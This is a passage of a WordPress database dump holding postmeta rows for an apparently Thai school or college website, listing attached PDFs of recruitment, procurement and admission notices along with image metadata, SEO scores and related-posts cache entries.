(11426, 5081, '_wp_attached_file', '2019/01/ประกาศ-รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว-เจ้าหน้าที่-3-อัตรา.pdf'),
(11430, 5080, '_hide_featured', NULL),
(11431, 5080, '_yoast_wpseo_content_score', '60'),
(11432, 5080, '_yoast_wpseo_primary_category', '3'),
(11433, 5080, '_wpas_done_all', '1'),
(11434, 5083, '_wp_attached_file', '2019/01/ประกาศ-รายชื่อผู้ชนะการประกวดราคาซื้อครุภัณฑ์หุ่นยนต์CMT-จำนวน-๑-ชุด-1.pdf'),
(11437, 5075, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575357162;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4982;}i:1;a:1:{s:2:\"id\";i:4781;}i:2;a:1:{s:2:\"id\";i:4803;}}}}'),
(11438, 5080, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575383963;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(11439, 5085, '_edit_lock', '1548130348:3'),
(11440, 5086, '_wp_attached_file', '2019/01/ประกาศ-ประกวดราคาจ้างก่อสร้างอาคารเรียน-จำนวน-1-หลัง.pdf'),
(11441, 5085, '_edit_last', '3'),
(11445, 5085, '_hide_featured', NULL),
(11446, 5085, '_yoast_wpseo_content_score', '60'),
(11447, 5085, '_yoast_wpseo_primary_category', '3'),
(11448, 5085, '_wpas_done_all', '1'),
(11449, 5088, '_edit_lock', '1548144255:3'),
(11450, 5085, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575530585;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5589;}i:1;a:1:{s:2:\"id\";i:5680;}i:2;a:1:{s:2:\"id\";i:5830;}}}}'),
(11451, 5088, '_edit_last', '3'),
(11452, 5089, '_wp_attached_file', '2019/01/ประกาศ-ประชาพิจารณ์ะครุภัณฑ์การศึกษา-สาขาวิชาช่างยนต์-ประจำปีงบประมาณ-๒๕๖๒.pdf'),
(11456, 5088, '_hide_featured', NULL),
(11457, 5088, '_yoast_wpseo_content_score', '60'),
(11458, 5088, '_yoast_wpseo_primary_category', '3'),
(11459, 5088, '_wpas_done_all', '1'),
(11460, 5088, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575586644;s:7:\"payload\";a:0:{}}}'),
(11461, 5091, '_edit_lock', '1548144469:3'),
(11462, 5091, '_edit_last', '3'),
(11463, 5092, '_wp_attached_file', '2019/01/50321308_748063982236459_5751719747813113856_o.jpg'),
(11464, 5092, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1165;s:4:\"file\";s:58:\"2019/01/50321308_748063982236459_5751719747813113856_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"50321308_748063982236459_5751719747813113856_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"50321308_748063982236459_5751719747813113856_o-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"50321308_748063982236459_5751719747813113856_o-768x437.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"50321308_748063982236459_5751719747813113856_o-1024x583.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:583;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"50321308_748063982236459_5751719747813113856_o-400x228.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:228;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11465, 5091, '_thumbnail_id', '5092'),
(11469, 5091, '_hide_featured', NULL),
(11470, 5091, '_yoast_wpseo_content_score', '30'),
(11471, 5091, '_yoast_wpseo_primary_category', '31'),
(11472, 5091, '_wpas_done_all', '1'),
(11473, 5094, '_edit_lock', '1548146199:3'),
(11474, 5094, '_edit_last', '3'),
(11475, 5095, '_wp_attached_file', '2019/01/50742006_748157252227132_6178265650197168128_o.jpg'),
(11476, 5095, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/50742006_748157252227132_6178265650197168128_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"50742006_748157252227132_6178265650197168128_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"50742006_748157252227132_6178265650197168128_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"50742006_748157252227132_6178265650197168128_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"50742006_748157252227132_6178265650197168128_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"50742006_748157252227132_6178265650197168128_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11477, 5094, '_thumbnail_id', '5095'),
(11481, 5094, '_hide_featured', NULL),
(11482, 5094, '_yoast_wpseo_content_score', '30'),
(11483, 5094, '_yoast_wpseo_primary_category', '31'),
(11484, 5094, '_wpas_done_all', '1'),
(11485, 5097, '_wp_attached_file', '2019/01/ประกาศ-รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว-เจ้าหน้าที่-3-อัตราedit.pdf'),
(11488, 5094, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575454959;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6119;}i:1;a:1:{s:2:\"id\";i:5104;}i:2;a:1:{s:2:\"id\";i:5038;}}}}'),
(11489, 5091, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575437404;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5029;}i:1;a:1:{s:2:\"id\";i:6063;}i:2;a:1:{s:2:\"id\";i:6071;}}}}'),
(11490, 5101, '_wp_attached_file', '2019/01/28-1-2562-8-15-45.png'),
(11491, 5101, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:927;s:6:\"height\";i:662;s:4:\"file\";s:29:\"2019/01/28-1-2562-8-15-45.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"28-1-2562-8-15-45-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"28-1-2562-8-15-45-300x214.png\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"28-1-2562-8-15-45-768x548.png\";s:5:\"width\";i:768;s:6:\"height\";i:548;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"28-1-2562-8-15-45-400x286.png\";s:5:\"width\";i:400;s:6:\"height\";i:286;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11492, 5104, '_edit_lock', '1548657277:3'),
(11493, 5104, '_edit_last', '3'),
(11494, 5105, '_wp_attached_file', '2019/01/28-1-2562-11-58-39.png'),
(11495, 5105, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:507;s:6:\"height\";i:804;s:4:\"file\";s:30:\"2019/01/28-1-2562-11-58-39.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"28-1-2562-11-58-39-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"28-1-2562-11-58-39-189x300.png\";s:5:\"width\";i:189;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"28-1-2562-11-58-39-189x300.png\";s:5:\"width\";i:189;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11496, 5106, '_wp_attached_file', '2019/01/50312641_749806232062234_4164681709343735808_o.jpg'),
(11497, 5106, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2019/01/50312641_749806232062234_4164681709343735808_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"50312641_749806232062234_4164681709343735808_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"50312641_749806232062234_4164681709343735808_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"50312641_749806232062234_4164681709343735808_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"50312641_749806232062234_4164681709343735808_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"50312641_749806232062234_4164681709343735808_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11498, 5104, '_thumbnail_id', '5106'),
(11502, 5104, '_hide_featured', NULL),
(11503, 5104, '_yoast_wpseo_content_score', '30'),
(11504, 5104, '_yoast_wpseo_primary_category', '31'),
(11505, 5104, '_wpas_done_all', '1'),
(11506, 5104, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575109844;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5094;}i:1;a:1:{s:2:\"id\";i:5197;}i:2;a:1:{s:2:\"id\";i:5141;}}}}'),
(11507, 5108, '_wp_attached_file', '2019/01/28-1-2562-13-33-49.png'),
(11508, 5108, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:952;s:6:\"height\";i:632;s:4:\"file\";s:30:\"2019/01/28-1-2562-13-33-49.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"28-1-2562-13-33-49-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"28-1-2562-13-33-49-300x199.png\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"28-1-2562-13-33-49-768x510.png\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"28-1-2562-13-33-49-400x266.png\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11511, 5111, '_wp_attached_file', '2019/01/2125121251.png'),
(11512, 5111, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:950;s:6:\"height\";i:826;s:4:\"file\";s:22:\"2019/01/2125121251.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"2125121251-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"2125121251-300x261.png\";s:5:\"width\";i:300;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"2125121251-768x668.png\";s:5:\"width\";i:768;s:6:\"height\";i:668;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"2125121251-345x300.png\";s:5:\"width\";i:345;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11513, 5113, '_wp_attached_file', '2019/01/28-1-2562-14-20-57.png'),
(11514, 5113, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:531;s:6:\"height\";i:351;s:4:\"file\";s:30:\"2019/01/28-1-2562-14-20-57.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"28-1-2562-14-20-57-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"28-1-2562-14-20-57-300x198.png\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"28-1-2562-14-20-57-400x264.png\";s:5:\"width\";i:400;s:6:\"height\";i:264;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11515, 5115, '_edit_lock', '1548752162:3'),
(11516, 5115, '_edit_last', '3'),
(11517, 5116, '_wp_attached_file', '2019/01/ประกาศ-เผยแพร่การจัดซื้อจัดจ้างประจำปีงบประมาณ-2562.pdf'),
(11521, 5115, '_hide_featured', NULL),
(11522, 5115, '_yoast_wpseo_content_score', '60'),
(11523, 5115, '_yoast_wpseo_primary_category', '3'),
(11524, 5115, '_wpas_done_all', '1'),
(11525, 5115, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575245767;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4907;}i:1;a:1:{s:2:\"id\";i:4154;}i:2;a:1:{s:2:\"id\";i:4975;}}}}'),
(11528, 5120, '_edit_lock', '1548754204:3'),
(11529, 5120, '_edit_last', '3'),
(11530, 5121, '_wp_attached_file', '2019/01/ประกาศ-รายชื่อผู้มีสิทธิสอบ-ทำหน้าที่เจ้าหน้าที่-จำนวน-3-อัตรา.pdf'),
(11534, 5120, '_hide_featured', NULL),
(11535, 5120, '_yoast_wpseo_content_score', '30'),
(11536, 5120, '_yoast_wpseo_primary_category', '3'),
(11537, 5120, '_wpas_done_all', '1'),
(11538, 5120, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575664522;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(11543, 5124, '_edit_lock', '1548754660:3'),
(11544, 5124, '_edit_last', '3'),
(11545, 5125, '_wp_attached_file', '2019/01/ตารางเวร-เดือนกุมภาพันธ์-2562.pdf'),
(11549, 5124, '_hide_featured', NULL),
(11550, 5124, '_yoast_wpseo_content_score', '60'),
(11551, 5124, '_yoast_wpseo_primary_category', '3'),
(11552, 5124, '_wpas_done_all', '1'),
(11553, 5124, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575461202;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5361;}i:1;a:1:{s:2:\"id\";i:4786;}i:2;a:1:{s:2:\"id\";i:5277;}}}}'),
(11554, 1354, '_yoast_wpseo_content_score', '60'),
(11555, 1445, '_yoast_wpseo_content_score', '60'),
(11556, 5130, '_edit_lock', '1550818816:3'),
(11557, 5130, '_edit_last', '3'),
(11558, 5130, '_hide_featured', NULL),
(11559, 5130, '_yoast_wpseo_content_score', '90'),
(11560, 5134, '_edit_lock', '1548908701:3'),
(11561, 5134, '_edit_last', '3'),
(11562, 5135, '_wp_attached_file', '2019/01/ประกาศ-ผลสอบคัดเลือก-เจ้าหน้าที่ธุรการ-3-อัตรา.pdf'),
(11566, 5134, '_hide_featured', NULL),
(11567, 5134, '_yoast_wpseo_content_score', '60'),
(11568, 5134, '_yoast_wpseo_primary_category', '3'),
(11569, 5134, '_wpas_done_all', '1'),
(11570, 5134, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575301776;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(11571, 5137, '_edit_lock', '1548909724:3'),
(11572, 5137, '_edit_last', '3'),
(11573, 5138, '_wp_attached_file', '2019/01/51226429_753194448390079_1754589548819513344_o.jpg'),
(11574, 5138, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2019/01/51226429_753194448390079_1754589548819513344_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"51226429_753194448390079_1754589548819513344_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"51226429_753194448390079_1754589548819513344_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"51226429_753194448390079_1754589548819513344_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"51226429_753194448390079_1754589548819513344_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"51226429_753194448390079_1754589548819513344_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11575, 5137, '_thumbnail_id', '5138'),
(11579, 5137, '_hide_featured', NULL),
(11580, 5137, '_yoast_wpseo_content_score', '30'),
(11581, 5137, '_yoast_wpseo_primary_category', '31'),
(11582, 5137, '_wpas_done_all', '1'),
(11583, 5137, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575570651;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5900;}i:1;a:1:{s:2:\"id\";i:6138;}i:2;a:1:{s:2:\"id\";i:6136;}}}}'),
(11584, 5141, '_edit_lock', '1549251703:3'),
(11585, 5141, '_edit_last', '3'),
(11586, 5142, '_wp_attached_file', '2019/02/51137483_754393864936804_6798503994831405056_o.jpg'),
(11587, 5142, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1616;s:6:\"height\";i:1080;s:4:\"file\";s:58:\"2019/02/51137483_754393864936804_6798503994831405056_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"51137483_754393864936804_6798503994831405056_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"51137483_754393864936804_6798503994831405056_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"51137483_754393864936804_6798503994831405056_o-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"51137483_754393864936804_6798503994831405056_o-1024x684.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:684;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"51137483_754393864936804_6798503994831405056_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11588, 5141, '_thumbnail_id', '5150'),
(11592, 5141, '_hide_featured', NULL),
(11593, 5141, '_yoast_wpseo_content_score', '30'),
(11594, 5141, '_yoast_wpseo_primary_category', '31'),
(11595, 5141, '_wpas_done_all', '1'),
(11596, 5144, '_wp_attached_file', '2019/01/คู่มือการรับสมัคร-นักเรียน-2562.pdf'),
(11597, 5147, '_edit_lock', '1549252700:3'),
(11598, 5141, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575680727;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5094;}i:1;a:1:{s:2:\"id\";i:4265;}i:2;a:1:{s:2:\"id\";i:5104;}}}}'),
(11599, 5149, '_wp_attached_file', '2019/02/4-2-2562-10-14-27.png'),
(11600, 5149, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:503;s:6:\"height\";i:692;s:4:\"file\";s:29:\"2019/02/4-2-2562-10-14-27.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-2-2562-10-14-27-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"4-2-2562-10-14-27-218x300.png\";s:5:\"width\";i:218;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"4-2-2562-10-14-27-218x300.png\";s:5:\"width\";i:218;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11601, 5150, '_wp_attached_file', '2019/02/51286822_754485364927654_6403831555852075008_o.jpg'),
